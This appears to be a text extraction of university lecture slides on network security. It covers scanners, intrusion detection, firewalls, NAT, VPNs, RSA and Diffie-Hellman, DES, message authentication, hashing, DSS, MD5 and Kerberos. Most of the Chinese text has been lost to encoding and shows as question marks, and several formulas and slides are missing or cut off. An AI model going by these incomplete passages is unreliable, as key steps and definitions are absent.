SATAN / SAINT ????
ISS ISS Internet/Intranet Scanner
NAI CyberCop Sting (http//www.nai.com)
Nessus project (http//www.tw.nessus.org)

114
?????? (C.1)

IDS
NFR (http//www.nfr.net/)
DTK (http//www.all.net/dtk/)

115
?????? Nessus

Nessus project ????????
Free
Powerful
Up-to-date
Easy to use
?remote security scanner?
???????

116
??????????

?????????????????
?????????????
????
?? IP Spoofing
????? ICMP ??
???????????
??????????????

117
??????????

????????, ??????
??TCP Wrapper ????(???swatch)
?????????
/etc/hosts.equiv, hosts.allow, hosts.deny,
????.rhost
??SNP tool (????????????)
ftp//ftp.csie.nctu.edu.tw/pub/CSIE/snp/
??????

118
??????????(Cont.)

??Mail Server ???server???
??????????????????
????? (Firewall)
Intrusion Detection System

119
?????????? ??Firewall

Firewall
??
??????????????????????????, ????????
A firewall system is used to control access to
or from a protected network ( a site ).
??? pcanywhere

120
Firewall?????

?????
???????????????
??Firewall?????, ??, ?????
Firewall????????
?????????modem??
?????????Internet
??????????????????
Firewall???

121
Firewall????

?????????
??????? Trapdoor
???????????????????
??????
Bottleneck
?????????
MIS??, ??????????????

122
?????? (NAT)

NAT changes the ip addresses in a packet, so that
the address of the client inside never shows up
on the internet.
Examples Cisco PIX, Linux Masquerading,
Firewall One, ipfilter, FreeBSD NAT

123
Private IP/NAT Intranet
Internet
192.168.1.1
192.168.1.2
192.168.1.2
Server
Server
Ethernet
Ethernet
124
Virtual Private Networks

VPN connects the components of one network over
another network by tunnel through the public
network(Internet) with security and features
formerly available only in private networks
VPN saves the cost of Dedicated Line
Brief VPN is Secure Tunnel

125
Public-Key Cryptographic Algorithms?????????

RSA and Diffie-Hellman
RSA - Ron Rives, Adi Shamir and Len Adleman at
MIT, in 1977.
RSA is a block cipher
The most widely implemented
Diffie-Hellman in 1976
Echange a secret key securely
Compute discrete logarithms

126
The RSA Algorithm Key
Generation

Select p,q p and q both prime
Calculate n p x q
Calculate
Select integer e
Calculate d
Public Key KU e,n
Private key KR d,n

127
Example of RSA Algorithm

Select p,q p 7, q 17
Calculate n p x q 7 x 17 119
Calculate 96
Select integer e5
Calculate d 77
Public Key KU e,n 5, 119
Private key KR d,n 77, 119

?? 77 x 5 385 4 x 96 1
128
Example of RSA Algorithm (cont.)
129
Diffie-Hellman Key Echange
? ? q ???????????????(A??B)
????? K ???
130
Conventional Encryption Algorithms

Data Encryption Standard (DES)
The most widely used encryption scheme
The algorithm is reffered to the Data Encryption
Algorithm (DEA)
DES is a block cipher
The plaintext is processed in 64-bit blocks
The key is 56-bits in length

131
(No Transcript)
132
(No Transcript)
133
Authentication

Requirements - must be able to verify that
1. Message came from apparent source or
author,
2. Contents have not been altered,
3. Sometimes, it was sent at a certain time or
sequence.
Protection against active attack (falsification
of data and transactions)

134
Approaches to Message Authentication

Authentication Using Conventional Encryption
Only the sender and receiver should share a key
Message Authentication without Message Encryption
An authentication tag is generated and appended
to each message
Message Authentication Code
Calculate the MAC as a function of the message
and the key. MAC F(K, M)

135
(No Transcript)
136
One-way HASH function
137
One-way HASH function

Secret value is added before the hash and removed
before transmission.

138
Digital Signature Standard (DSS )

Uses Secure Hash Algorithm (SHA)
Condenses message to 160 bits
Key size 512 - 1024 bits
Proposed by NIST in 1991
Adopted 1994/05/19
FIPS PUB 186 -- Federal InformationProcessing
Standards Publication 186

139
Using the SHA with the DSA

From http//www.itl.nist.gov/fipspubs/fip186.htm

140
Message Digest 5 (MD5)

No formal mathematical foundation
Rely on producing random output
Operate on 512 bits at a time
Messages are padded with 0 where necessary
Each stage transforms 128-bit MD 512 bits of
message
MD5 does this 32-bits at a time
Current digest value is 4 32-bit words
(d0,d1,d2,d3)
Message value is 16 32-bit words (m0,m1,m15)

141
MD5 (cont-1)

Basic transformation can be divided into four
passes
First pass
New value of digest is produced from old value
and the 16 message words in 16 steps
first 6 steps are

142
KERBEROS

In Greek mythology, a many headed dog, the
guardian of the entrance of Hades

143
What is KERBEROS

Network authentication protocol
Developed at MIT Athena(???) project in 1983
Provides a centralized authentication server to
authenticate users to servers and servers to
users.
Relies on conventional encryption, making no use
of public-key encryption
Two versions version 4 and 5
Version 4 makes use of DES